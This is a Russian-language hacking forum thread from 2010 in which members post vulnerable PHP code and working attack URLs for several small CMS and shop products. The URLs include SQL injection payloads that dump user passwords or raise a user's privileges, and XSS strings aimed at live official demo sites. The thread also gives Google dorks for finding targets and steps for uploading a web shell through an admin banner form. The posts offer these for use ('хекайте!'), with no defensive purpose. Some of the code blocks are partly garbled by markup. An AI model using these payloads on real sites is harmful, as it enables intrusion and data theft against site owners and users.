ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

02.11.2010, 20:29
|
|
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме: 344917
Репутация:
17
|
|
Уязвимости Simple CMS
О Simple CMS
От себя хочу сказать, что Simple CMS. ver.1.0. вся дырявая. Почти на каждом месте есть SQL inj.
По дорку гугла мне выдало "Результатов: примерно 14 800 (0,35 сек.)".
SQL инъекции:
SQL inj в выборе статьи, уязвимый код:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'artcl'[/COLOR][COLOR="#007700"]]))
{
[/COLOR][COLOR="#0000BB"]$id_art[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'artcl'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT title, article FROM artcl WHERE IDart="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id_art[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
Как видно, нет никакой фильтрации..
Пример: localhost/index.php?id=3&artcl=-4 union select version(),2--
SQL inj в выборе раздела, уязвимый код:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]))
{
[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]];
}
else
{
[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];
}
print[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$razdel[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT menu, txt FROM tree WHERE id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
Пример: localhost/index.php?id=-3 union select 1,version()--
Незачем дальше перечислять, она вся в дырках.
К сожалению, хочу отметить, что пароли администраторов не хранятся в БД. Они находятся в файле connect.php.
Панель администратора находится по адресу /admin/, если вы попали в админку, то заходим: Баннеры > льём через форму загрузки баннеров шелл > шелл будет доступен по адресу images/shell.php
Вот вам пример, хекайте!
P.S Дорк "intext:Разработано Яшиной С. svetulik2004@mail.ru".
Модуль Новостей
Только что зашёл на официальный сайт в раздел Мои разработки, скачал модуль новостей и снова он бажный .
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id_news'[/COLOR][COLOR="#007700"]]))
{
[/COLOR][COLOR="#0000BB"]$id_news[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id_news'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$news[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT rus_name, rus_annonce, rus_content, date FROM news WHERE id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id_news[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
Пример: localhost/news/news.php?id_news=-2 union select version(),2,3,4--
З.Ы Писала движок девушка . Официальный сайт
|
|
|

02.11.2010, 20:30
|
|
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме: 344917
Репутация:
17
|
|
Уязвимости Booot CMS
Тип уязвимости: SQL inj
Зависимости: Права админа
Куски уязвимых кодов:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'top'[/COLOR][COLOR="#007700"]])) {
[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM `prefix_products_topics` WHERE `id` = "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'top'[/COLOR][COLOR="#007700"]]);
[/COLOR][/COLOR]
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(!isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'top'[/COLOR][COLOR="#007700"]])) {
....
[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM `prefix_content` WHERE `id` = "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'top'[/COLOR][COLOR="#007700"]]);[/COLOR][/COLOR]
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(!isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'top'[/COLOR][COLOR="#007700"]])) {
....
[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM `prefix_content` WHERE `id` = "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'top'[/COLOR][COLOR="#007700"]]);[/COLOR][/COLOR]
Примеры:
host/admin/?module=Catalog&method=Info&top=-12 union select 1,2,3,version(),5,6,7,8,9,0,1,2,3,4,5,6,7,8--
host/admin/?module=Content&method=Info&top=-5 union select 1,2,3,4,version(),6,7,8,9,0,1,2,3--
Уязвима вся админка. Видимо разработчики решили, что баги в админке никому не нужны..
|
|
|

11.11.2010, 01:08
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме: 568388
Репутация:
87
|
|
Дополнение к посту от SeNaP
WAP ENGINE 4.2 (Возможно и другие версии)
активная xss в гостевой книге
\modules\guest\send.php
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];
...
[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'http://'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'|'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
Сайт (URL): __XSS
Путь
Сообщение от None
http://wap-engine.ru/modules/news/last.php
http://wap-engine.ru/modules/news/last1.php
|
|
|

13.11.2010, 11:31
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме: 472147
Репутация:
211
|
|
Ajax OnlineShop 1.0
SQL Injection
оффсайт:
Код:
Code:
http://www.ajax-onlineshop.de/demo/index.php?id=4997+UNION+SELECT+1,2,3,version%28%29,5,6,7,8%20--+#seo_loaded%28-4997%29
параметр index.php?id= прийдется дописывать самому из за функции:document.URL.split
PHP код:
PHP: [COLOR="#000000"]// if get id in url but no #
if ( ([COLOR="#0000BB"][/COLOR] != 0) && (![COLOR="#0000BB"][/COLOR]) && (document.URL.search(/#.+/) == -1) ) {
wohinJS = 'reload';
var start_name = document.URL.split ('?id=');
var hist_event_name = start_name[0] + "(" + start_name[1] + ")"; // generate history-event-name
addHistoryEvent('seo_loaded('+ start_name[1] +')', start_name[1]); // load requested page
}
else {
var start_name = document.URL.split ('#');
[COLOR="#0000BB"]
[/COLOR] if (start_name[1]) { // exist history-ID in url...
wohinJS = 'reload';
start_name = start_name[1].split ('('); // ...yes, split the name
var start_id = filterZahl(start_name[1]); // extract the id // del wenn sicher: filterZahl(start_url)
//$('log').innerHTML = start_name[0] + " - " + start_id; // testing
var hist_event_name = start_name[0] + "(" + start_id + ")"; // generate history-event-name
addHistoryEvent(hist_event_name, start_id); // load requested page
}
else { // ...no, then load shop-startpage
[COLOR="#0000BB"][/COLOR][/COLOR]
уязвимы все сайты,их достаточно много
|
|
|

14.11.2010, 21:17
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме: 3300342
Репутация:
165
|
|
Сообщение от 547
547 said:
Ajax OnlineShop 1.0
SQL Injection
оффсайт:
Код:
Code:
http://www.ajax-onlineshop.de/demo/index.php?id=4997+UNION+SELECT+1,2,3,version%28%29,5,6,7,8%20--+#seo_loaded%28-4997%29
параметр index.php?id= прийдется дописывать самому из за функции:document.URL.split
PHP код:
PHP: [COLOR="#000000"]// if get id in url but no #
if ( ([COLOR="#0000BB"][/COLOR] != 0) && (![COLOR="#0000BB"][/COLOR]) && (document.URL.search(/#.+/) == -1) ) {
wohinJS = 'reload';
var start_name = document.URL.split ('?id=');
var hist_event_name = start_name[0] + "(" + start_name[1] + ")"; // generate history-event-name
addHistoryEvent('seo_loaded('+ start_name[1] +')', start_name[1]); // load requested page
}
else {
var start_name = document.URL.split ('#');
[COLOR="#0000BB"]
[/COLOR] if (start_name[1]) { // exist history-ID in url...
wohinJS = 'reload';
start_name = start_name[1].split ('('); // ...yes, split the name
var start_id = filterZahl(start_name[1]); // extract the id // del wenn sicher: filterZahl(start_url)
//$('log').innerHTML = start_name[0] + " - " + start_id; // testing
var hist_event_name = start_name[0] + "(" + start_id + ")"; // generate history-event-name
addHistoryEvent(hist_event_name, start_id); // load requested page
}
else { // ...no, then load shop-startpage
[COLOR="#0000BB"][/COLOR][/COLOR]
уязвимы все сайты,их достаточно много
547, не тот код уязвим.
Так правильнее будет.
--->index.php
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ( (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]])) && ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]) ) {
[/COLOR][COLOR="#0000BB"]$startpage[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"false"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$id_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]];
}
else {
[/COLOR][COLOR="#0000BB"]$id_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_startpage_link[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$startpage[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"true"[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#0000BB"]$seo_infos[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]seo_get_site_infos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id_page[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
--->config.php
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]get_prod_comments[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$prod_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$new_added[/COLOR][COLOR="#007700"]) {
global[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$outputText[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$backgr_zaehler[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$backgr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"backgroundcolor: #"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"row_colors"[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'backgr_maindivs'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]";"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]gen_seitenzahlarr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"aong_shop_art_comments"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"prodID =[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$prod_id[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]AND del='N'"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"prodcomments"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$limit[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
if (![/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$limit[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]" LIMIT "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"start"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]", "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"proseite"[/COLOR][COLOR="#007700"]];
}
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]sql[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM aong_shop_art_comments "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"where_state"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]" ORDER BY ID DESC[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$limit[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$page_prodcomments_amount[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]count_rows[/COLOR][COLOR="#007700"]();
if (![/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$outputText[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]gen_seitenzahlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"proseite"[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"seiten"[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"start"[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]"oben"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"prodcomments"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$prod_id[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]$outputText[/COLOR][COLOR="#007700"].=
[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
while ([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"])) {
if ([/COLOR][COLOR="#0000BB"]$backgr_zaehler[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]){
[/COLOR][COLOR="#0000BB"]$backgr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"background-color: #"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"row_colors"[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'backgr_maindivs'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]";"[/COLOR][COLOR="#007700"];
}
else{
[/COLOR][COLOR="#0000BB"]$backgr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"background-color: #"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"row_colors"[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'backgr_div_weich'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]";"[/COLOR][COLOR="#007700"];
}
if ( ([/COLOR][COLOR="#0000BB"]$new_added[/COLOR][COLOR="#007700"]) ==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]&& ([/COLOR][COLOR="#0000BB"]$backgr_zaehler[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) ){
[/COLOR][COLOR="#0000BB"]$new_added_addon[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]" color: #2A5206;"[/COLOR][COLOR="#007700"];
}
else {
[/COLOR][COLOR="#0000BB"]$new_added_addon[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#0000BB"]$outputText[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"
"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"name"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"am "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"d.m.Y"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"time"[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]" um "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"H:i"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"time"[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]" Uhr
vor "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]intervall[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]()-[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"time"[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]"
"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]nl2br[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"txt"[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]"
"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$backgr_zaehler[/COLOR][COLOR="#007700"]++;
}
[/COLOR][COLOR="#0000BB"]$outputText[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
if (![/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$outputText[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]gen_seitenzahlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"proseite"[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"seiten"[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"start"[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]"unten"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"prodcomments"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$prod_id[/COLOR][COLOR="#007700"]);
}
return[/COLOR][COLOR="#0000BB"]$outputText[/COLOR][COLOR="#007700"];
}
....
[/COLOR][/COLOR]
https://rdot.org/forum/showpost.php?p=9338&postcount=5
|
|
|

15.11.2010, 05:06
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 90
Провел на форуме: 390073
Репутация:
44
|
|
MyMuWeb 0.7,0.6 (более ранние не смотрел)
Движок довольно часто встречается на игровых серверах Mu Online. Фикс давно вышел, но есть еще довольно много "отсталых".
Sql injection :
Код:
Code:
http://localhost/?ref='updаtе/**/memb_info/**/set/**/mmw_status='9'/**/where/**/memb___id='Ваш юзернейм'--&ref=Существующий на сервере юзернейм (можно свой)
П.С. БД железобетонно MSSQL.
|
|
|

19.11.2010, 14:13
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме: 691279
Репутация:
55
|
|
Дополнение к посту от 547
Ajax OnlineShop 1.0
Xss
офф-демо-сайт
Код:
Code:
http://www.ajax-onlineshop.de/demo/index.php?id=1">alert('d0s')
+xss на офф.сайте
Код:
Code:
http://www.ajax-onlineshop.de/servicemail/
Заполняем все поля,уязвимое поле - Name
Вбиваем туда что-нибудь типо
[CODE]
Code:
">alert(1)
|
|
|

25.11.2010, 17:25
|
|
Guest
Сообщений: n/a
Провел на форуме: 34733
Репутация:
83
|
|
osPHPSite 0.0.1 Beta
http://www.osphpsite.com/
SQL Injection:
/index.php
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]database_connect[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * from content
WHERE id =[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];
...[/COLOR][/COLOR]
Пример:
Код:
Code:
http://php/index.php?id=25%20union%20select%201,concat_ws(0x3a,id,username,password),3,4,5,6,7,8 from user--
Необходимы права администратора. Путь:
Код:
Code:
http://php/admin/index.php?page[]=config
Многие места так же уязвимы к SQL inj. Скрипт полностью бажный.
|
|
|
|

25.11.2010, 18:40
|
|
Guest
Сообщений: n/a
Провел на форуме: 34733
Репутация:
83
|
|
NinkoBB v. 1.3
http://ninkobb.com/
XSS:
Создаем новый топик, по адресу message.php с "Subject" и "Message" содержанием:
И пока топик висит на главной странице имеем активную XSS.
[/B]
|
|
|
|

27.11.2010, 03:29
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме: 691279
Репутация:
55
|
|
KAPCMS v0.904
http://kapcms.ru/
XSS
Вписываем в поле поиска пишем:
Гет запрос будет выглядить следующем образом:
Код:
Code:
http://kapcms.ru/?s=alert(1)&page=11
[/B]
|
|
|
|
 |
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Библиотека
|
SladerNon |
Болталка |
17 |
05.02.2007 23:30 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|